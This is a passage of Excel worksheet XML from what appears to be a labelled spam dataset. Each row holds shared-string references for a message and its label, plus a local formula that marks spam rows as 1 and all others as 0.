    <row r="1763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1763" t="s">
        <v>7000</v>
      </c>
      <c r="B1763" t="s">
        <v>5294</v>
      </c>
      <c r="C1763" s="1">
        <f>IF(B1763="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1764" t="s">
        <v>7001</v>
      </c>
      <c r="B1764" t="s">
        <v>5294</v>
      </c>
      <c r="C1764" s="1">
        <f>IF(B1764="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1765" t="s">
        <v>7002</v>
      </c>
      <c r="B1765" t="s">
        <v>5294</v>
      </c>
      <c r="C1765" s="1">
        <f>IF(B1765="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1766" t="s">
        <v>7003</v>
      </c>
      <c r="B1766" t="s">
        <v>5297</v>
      </c>
      <c r="C1766" s="1">
        <f>IF(B1766="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1767" t="s">
        <v>7004</v>
      </c>
      <c r="B1767" t="s">
        <v>5294</v>
      </c>
      <c r="C1767" s="1">
        <f>IF(B1767="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1768" t="s">
        <v>7005</v>
      </c>
      <c r="B1768" t="s">
        <v>5297</v>
      </c>
      <c r="C1768" s="1">
        <f>IF(B1768="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1769" t="s">
        <v>7006</v>
      </c>
      <c r="B1769" t="s">
        <v>5294</v>
      </c>
      <c r="C1769" s="1">
        <f>IF(B1769="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1770" t="s">
        <v>7007</v>
      </c>
      <c r="B1770" t="s">
        <v>5294</v>
      </c>
      <c r="C1770" s="1">
        <f>IF(B1770="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1771" t="s">
        <v>7008</v>
      </c>
      <c r="B1771" t="s">
        <v>5294</v>
      </c>
      <c r="C1771" s="1">
        <f>IF(B1771="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1772" t="s">
        <v>7009</v>
      </c>
      <c r="B1772" t="s">
        <v>5294</v>
      </c>
      <c r="C1772" s="1">
        <f>IF(B1772="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1773" t="s">
        <v>7010</v>
      </c>
      <c r="B1773" t="s">
        <v>5294</v>
      </c>
      <c r="C1773" s="1">
        <f>IF(B1773="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1774" t="s">
        <v>7011</v>
      </c>
      <c r="B1774" t="s">
        <v>5294</v>
      </c>
      <c r="C1774" s="1">
        <f>IF(B1774="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1775" t="s">
        <v>7012</v>
      </c>
      <c r="B1775" t="s">
        <v>5294</v>
      </c>
      <c r="C1775" s="1">
        <f>IF(B1775="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1776" t="s">
        <v>7013</v>
      </c>
      <c r="B1776" t="s">
        <v>5294</v>
      </c>
      <c r="C1776" s="1">
        <f>IF(B1776="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1777" t="s">
        <v>7014</v>
      </c>
      <c r="B1777" t="s">
        <v>5294</v>
      </c>
      <c r="C1777" s="1">
        <f>IF(B1777="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1778" t="s">
        <v>7015</v>
      </c>
      <c r="B1778" t="s">
        <v>5297</v>
      </c>
      <c r="C1778" s="1">
        <f>IF(B1778="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1779" t="s">
        <v>7016</v>
      </c>
      <c r="B1779" t="s">
        <v>5297</v>
      </c>
      <c r="C1779" s="1">
        <f>IF(B1779="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1780" t="s">
        <v>6719</v>
      </c>
      <c r="B1780" t="s">
        <v>5294</v>
      </c>
      <c r="C1780" s="1">
        <f>IF(B1780="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1781" t="s">
        <v>5742</v>
      </c>
      <c r="B1781" t="s">
        <v>5297</v>
      </c>
      <c r="C1781" s="1">
        <f>IF(B1781="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1782" t="s">
        <v>7017</v>
      </c>
      <c r="B1782" t="s">
        <v>5297</v>
      </c>
      <c r="C1782" s="1">
        <f>IF(B1782="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1783" t="s">
        <v>7018</v>
      </c>
      <c r="B1783" t="s">
        <v>5294</v>
      </c>
      <c r="C1783" s="1">
        <f>IF(B1783="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1784" t="s">
        <v>7019</v>
      </c>
      <c r="B1784" t="s">
        <v>5294</v>
      </c>
      <c r="C1784" s="1">
        <f>IF(B1784="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1785" t="s">
        <v>7020</v>
      </c>
      <c r="B1785" t="s">
        <v>5294</v>
      </c>
      <c r="C1785" s="1">
        <f>IF(B1785="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1786" t="s">
        <v>6832</v>
      </c>
      <c r="B1786" t="s">
        <v>5294</v>
      </c>
      <c r="C1786" s="1">
        <f>IF(B1786="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1787" t="s">
        <v>7021</v>
      </c>
      <c r="B1787" t="s">
        <v>5294</v>
      </c>
      <c r="C1787" s="1">
        <f>IF(B1787="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1788" t="s">
        <v>7022</v>
      </c>
      <c r="B1788" t="s">
        <v>5294</v>
      </c>
      <c r="C1788" s="1">
        <f>IF(B1788="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1789" t="s">
        <v>7023</v>
      </c>
      <c r="B1789" t="s">
        <v>5294</v>
      </c>
      <c r="C1789" s="1">
        <f>IF(B1789="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1790" t="s">
        <v>7024</v>
      </c>
      <c r="B1790" t="s">
        <v>5294</v>
      </c>
      <c r="C1790" s="1">
        <f>IF(B1790="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1791" t="s">
        <v>7025</v>
      </c>
      <c r="B1791" t="s">
        <v>5294</v>
      </c>
      <c r="C1791" s="1">
        <f>IF(B1791="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1792" t="s">
        <v>7026</v>
      </c>
      <c r="B1792" t="s">
        <v>5294</v>
      </c>
      <c r="C1792" s="1">
        <f>IF(B1792="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1793" t="s">
        <v>7027</v>
      </c>
      <c r="B1793" t="s">
        <v>5294</v>
      </c>
      <c r="C1793" s="1">
        <f>IF(B1793="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1794" t="s">
        <v>7028</v>
      </c>
      <c r="B1794" t="s">
        <v>5297</v>
      </c>
      <c r="C1794" s="1">
        <f>IF(B1794="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1795" t="s">
        <v>7029</v>
      </c>
      <c r="B1795" t="s">
        <v>5294</v>
      </c>
      <c r="C1795" s="1">
        <f>IF(B1795="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1796" t="s">
        <v>7030</v>
      </c>
      <c r="B1796" t="s">
        <v>5294</v>
      </c>
      <c r="C1796" s="1">
        <f>IF(B1796="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1797" t="s">
        <v>7031</v>
      </c>
      <c r="B1797" t="s">
        <v>5294</v>
      </c>
      <c r="C1797" s="1">
        <f>IF(B1797="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1798" t="s">
        <v>7032</v>
      </c>
      <c r="B1798" t="s">
        <v>5294</v>
      </c>
      <c r="C1798" s="1">
        <f>IF(B1798="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1799" t="s">
        <v>7033</v>
      </c>
      <c r="B1799" t="s">
        <v>5294</v>
      </c>
      <c r="C1799" s="1">
        <f>IF(B1799="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1800" t="s">
        <v>7034</v>
      </c>
      <c r="B1800" t="s">
        <v>5294</v>
      </c>
      <c r="C1800" s="1">
        <f>IF(B1800="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1801" t="s">
        <v>7035</v>
      </c>
      <c r="B1801" t="s">
        <v>5294</v>
      </c>
      <c r="C1801" s="1">
        <f>IF(B1801="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1802" t="s">
        <v>7036</v>
      </c>
      <c r="B1802" t="s">
        <v>5294</v>
      </c>
      <c r="C1802" s="1">
        <f>IF(B1802="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1803" t="s">
        <v>7037</v>
      </c>
      <c r="B1803" t="s">
        <v>5294</v>
      </c>
      <c r="C1803" s="1">
        <f>IF(B1803="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1804" t="s">
        <v>7038</v>
      </c>
      <c r="B1804" t="s">
        <v>5294</v>
      </c>
      <c r="C1804" s="1">
        <f>IF(B1804="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1805" t="s">
        <v>7039</v>
      </c>
      <c r="B1805" t="s">
        <v>5294</v>
      </c>
      <c r="C1805" s="1">
        <f>IF(B1805="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1806" t="s">
        <v>7040</v>
      </c>
      <c r="B1806" t="s">
        <v>5294</v>
      </c>
      <c r="C1806" s="1">
        <f>IF(B1806="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1807" t="s">
        <v>7041</v>
      </c>
      <c r="B1807" t="s">
        <v>5294</v>
      </c>
      <c r="C1807" s="1">
        <f>IF(B1807="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1808" t="s">
        <v>7042</v>
      </c>
      <c r="B1808" t="s">
        <v>5297</v>
      </c>
      <c r="C1808" s="1">
        <f>IF(B1808="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1809" t="s">
        <v>7043</v>
      </c>
      <c r="B1809" t="s">
        <v>5294</v>
      </c>
      <c r="C1809" s="1">
        <f>IF(B1809="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1810" t="s">
        <v>7044</v>
      </c>
      <c r="B1810" t="s">
        <v>5294</v>
      </c>
      <c r="C1810" s="1">
        <f>IF(B1810="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1811" t="s">
        <v>7045</v>
      </c>
      <c r="B1811" t="s">
        <v>5294</v>
      </c>
      <c r="C1811" s="1">
        <f>IF(B1811="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1812" t="s">
        <v>7046</v>
      </c>
      <c r="B1812" t="s">
        <v>5294</v>
      </c>
      <c r="C1812" s="1">
        <f>IF(B1812="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1813" t="s">
        <v>7047</v>
      </c>
      <c r="B1813" t="s">
        <v>5294</v>
      </c>
      <c r="C1813" s="1">
        <f>IF(B1813="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1814" t="s">
        <v>7048</v>
      </c>
      <c r="B1814" t="s">
        <v>5294</v>
      </c>
      <c r="C1814" s="1">
        <f>IF(B1814="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1815" t="s">
        <v>7049</v>
      </c>
      <c r="B1815" t="s">
        <v>5294</v>
      </c>
      <c r="C1815" s="1">
        <f>IF(B1815="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1816" t="s">
        <v>7050</v>
      </c>
      <c r="B1816" t="s">
        <v>5294</v>
      </c>
      <c r="C1816" s="1">
        <f>IF(B1816="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1817" t="s">
        <v>7051</v>
      </c>
      <c r="B1817" t="s">
        <v>5294</v>
      </c>
      <c r="C1817" s="1">
        <f>IF(B1817="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1818" t="s">
        <v>7052</v>
      </c>
      <c r="B1818" t="s">
        <v>5294</v>
      </c>
      <c r="C1818" s="1">
        <f>IF(B1818="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1819" t="s">
        <v>7053</v>
      </c>
      <c r="B1819" t="s">
        <v>5294</v>
      </c>
      <c r="C1819" s="1">
        <f>IF(B1819="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1820" t="s">
        <v>7054</v>
      </c>
      <c r="B1820" t="s">
        <v>5294</v>
      </c>
      <c r="C1820" s="1">
        <f>IF(B1820="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1821" t="s">
        <v>7055</v>
      </c>
      <c r="B1821" t="s">
        <v>5294</v>
      </c>
      <c r="C1821" s="1">
        <f>IF(B1821="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1822" t="s">
        <v>7056</v>
      </c>
      <c r="B1822" t="s">
        <v>5294</v>
      </c>
      <c r="C1822" s="1">
        <f>IF(B1822="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1823" t="s">
        <v>7057</v>
      </c>
      <c r="B1823" t="s">
        <v>5294</v>
      </c>
      <c r="C1823" s="1">
        <f>IF(B1823="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1824" t="s">
        <v>7058</v>
      </c>
      <c r="B1824" t="s">
        <v>5294</v>
      </c>
      <c r="C1824" s="1">
        <f>IF(B1824="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1825" t="s">
        <v>7059</v>
      </c>
      <c r="B1825" t="s">
        <v>5294</v>
      </c>
      <c r="C1825" s="1">
        <f>IF(B1825="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1826" t="s">
        <v>7060</v>
      </c>
      <c r="B1826" t="s">
        <v>5294</v>
      </c>
      <c r="C1826" s="1">
        <f>IF(B1826="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1827" t="s">
        <v>6354</v>
      </c>
      <c r="B1827" t="s">
        <v>5294</v>
      </c>
      <c r="C1827" s="1">
        <f>IF(B1827="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1828" t="s">
        <v>7061</v>
      </c>
      <c r="B1828" t="s">
        <v>5294</v>
      </c>
      <c r="C1828" s="1">
        <f>IF(B1828="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1829" t="s">
        <v>7062</v>
      </c>
      <c r="B1829" t="s">
        <v>5294</v>
      </c>
      <c r="C1829" s="1">
        <f>IF(B1829="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1830" t="s">
        <v>6295</v>
      </c>
      <c r="B1830" t="s">
        <v>5294</v>
      </c>
      <c r="C1830" s="1">
        <f>IF(B1830="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1831" t="s">
        <v>7063</v>
      </c>
      <c r="B1831" t="s">
        <v>5297</v>
      </c>
      <c r="C1831" s="1">
        <f>IF(B1831="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1832" t="s">
        <v>7064</v>
      </c>
      <c r="B1832" t="s">
        <v>5294</v>
      </c>
      <c r="C1832" s="1">
        <f>IF(B1832="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1833" t="s">
        <v>7065</v>
      </c>
      <c r="B1833" t="s">
        <v>5294</v>
      </c>
      <c r="C1833" s="1">
        <f>IF(B1833="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1834" t="s">
        <v>7066</v>
      </c>
      <c r="B1834" t="s">
        <v>5294</v>
      </c>
      <c r="C1834" s="1">
        <f>IF(B1834="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1835" t="s">
        <v>7067</v>
      </c>
      <c r="B1835" t="s">
        <v>5294</v>
      </c>
      <c r="C1835" s="1">
        <f>IF(B1835="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1836" t="s">
        <v>7068</v>
      </c>
      <c r="B1836" t="s">
        <v>5294</v>
      </c>
      <c r="C1836" s="1">
        <f>IF(B1836="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1837" t="s">
        <v>7069</v>
      </c>
      <c r="B1837" t="s">
        <v>5294</v>
      </c>
      <c r="C1837" s="1">
        <f>IF(B1837="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1838" t="s">
        <v>7070</v>
      </c>
      <c r="B1838" t="s">
        <v>5294</v>
      </c>
      <c r="C1838" s="1">
        <f>IF(B1838="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1839" t="s">
        <v>7071</v>
      </c>
      <c r="B1839" t="s">
        <v>5294</v>
      </c>
      <c r="C1839" s="1">
        <f>IF(B1839="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1840" t="s">
        <v>7072</v>
      </c>
      <c r="B1840" t="s">
        <v>5297</v>
      </c>
      <c r="C1840" s="1">
        <f>IF(B1840="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1841" t="s">
        <v>7073</v>
      </c>
      <c r="B1841" t="s">
        <v>5294</v>
      </c>
      <c r="C1841" s="1">
        <f>IF(B1841="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1842" t="s">
        <v>7074</v>
      </c>
      <c r="B1842" t="s">
        <v>5294</v>
      </c>
      <c r="C1842" s="1">
        <f>IF(B1842="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1843" t="s">
        <v>7075</v>
      </c>
      <c r="B1843" t="s">
        <v>5294</v>
      </c>
      <c r="C1843" s="1">
        <f>IF(B1843="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1844" t="s">
        <v>7076</v>
      </c>
      <c r="B1844" t="s">
        <v>5294</v>
      </c>
      <c r="C1844" s="1">
        <f>IF(B1844="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1845" t="s">
        <v>7077</v>
      </c>
      <c r="B1845" t="s">
        <v>5294</v>
      </c>
      <c r="C1845" s="1">
        <f>IF(B1845="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1846" t="s">
        <v>7078</v>
      </c>
      <c r="B1846" t="s">
        <v>5294</v>
      </c>
      <c r="C1846" s="1">
        <f>IF(B1846="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1847" t="s">
        <v>7079</v>
      </c>
      <c r="B1847" t="s">
        <v>5294</v>
      </c>
      <c r="C1847" s="1">
        <f>IF(B1847="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1848" t="s">
        <v>7080</v>
      </c>
      <c r="B1848" t="s">
        <v>5294</v>
      </c>
      <c r="C1848" s="1">
        <f>IF(B1848="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1849" t="s">
        <v>7081</v>
      </c>
      <c r="B1849" t="s">
        <v>5297</v>
      </c>
      <c r="C1849" s="1">
        <f>IF(B1849="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1850" t="s">
        <v>7082</v>
      </c>
      <c r="B1850" t="s">
        <v>5294</v>
      </c>
      <c r="C1850" s="1">
        <f>IF(B1850="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1851" t="s">
        <v>7083</v>
      </c>
      <c r="B1851" t="s">
        <v>5294</v>
      </c>
      <c r="C1851" s="1">
        <f>IF(B1851="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1852" t="s">
        <v>7084</v>
      </c>
      <c r="B1852" t="s">
        <v>5294</v>
      </c>
      <c r="C1852" s="1">
        <f>IF(B1852="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1853" t="s">
        <v>7085</v>
      </c>
      <c r="B1853" t="s">
        <v>5294</v>
      </c>
      <c r="C1853" s="1">
        <f>IF(B1853="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1854" t="s">
        <v>7086</v>
      </c>
      <c r="B1854" t="s">
        <v>5297</v>
      </c>
      <c r="C1854" s="1">
        <f>IF(B1854="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1855" t="s">
        <v>7087</v>
      </c>
      <c r="B1855" t="s">
        <v>5294</v>
      </c>
      <c r="C1855" s="1">
        <f>IF(B1855="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1856" t="s">
        <v>7088</v>
      </c>
      <c r="B1856" t="s">
        <v>5294</v>
      </c>
      <c r="C1856" s="1">
        <f>IF(B1856="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1857" t="s">
        <v>7089</v>
      </c>
      <c r="B1857" t="s">
        <v>5294</v>
      </c>
      <c r="C1857" s="1">
        <f>IF(B1857="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1858" t="s">
        <v>7090</v>
      </c>
      <c r="B1858" t="s">
        <v>5294</v>
      </c>
      <c r="C1858" s="1">
        <f>IF(B1858="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1859" t="s">
        <v>7091</v>
      </c>
      <c r="B1859" t="s">
        <v>5294</v>
      </c>
      <c r="C1859" s="1">
        <f>IF(B1859="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1860" t="s">
        <v>7092</v>
      </c>
      <c r="B1860" t="s">
        <v>5294</v>
      </c>
      <c r="C1860" s="1">
        <f>IF(B1860="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1861" t="s">
        <v>7093</v>
      </c>
      <c r="B1861" t="s">
        <v>5294</v>
      </c>
      <c r="C1861" s="1">
        <f>IF(B1861="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1862" t="s">
        <v>7094</v>
      </c>
      <c r="B1862" t="s">
        <v>5294</v>
      </c>
      <c r="C1862" s="1">
        <f>IF(B1862="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1863" t="s">
        <v>7095</v>
      </c>
      <c r="B1863" t="s">
        <v>5294</v>
      </c>
      <c r="C1863" s="1">
        <f>IF(B1863="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1864" t="s">
        <v>7096</v>
      </c>
      <c r="B1864" t="s">
        <v>5294</v>
      </c>
      <c r="C1864" s="1">
        <f>IF(B1864="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1865" t="s">
        <v>7097</v>
      </c>
      <c r="B1865" t="s">
        <v>5294</v>
      </c>
      <c r="C1865" s="1">
        <f>IF(B1865="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1866" t="s">
        <v>7098</v>
      </c>
      <c r="B1866" t="s">
        <v>5294</v>
      </c>
      <c r="C1866" s="1">
        <f>IF(B1866="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
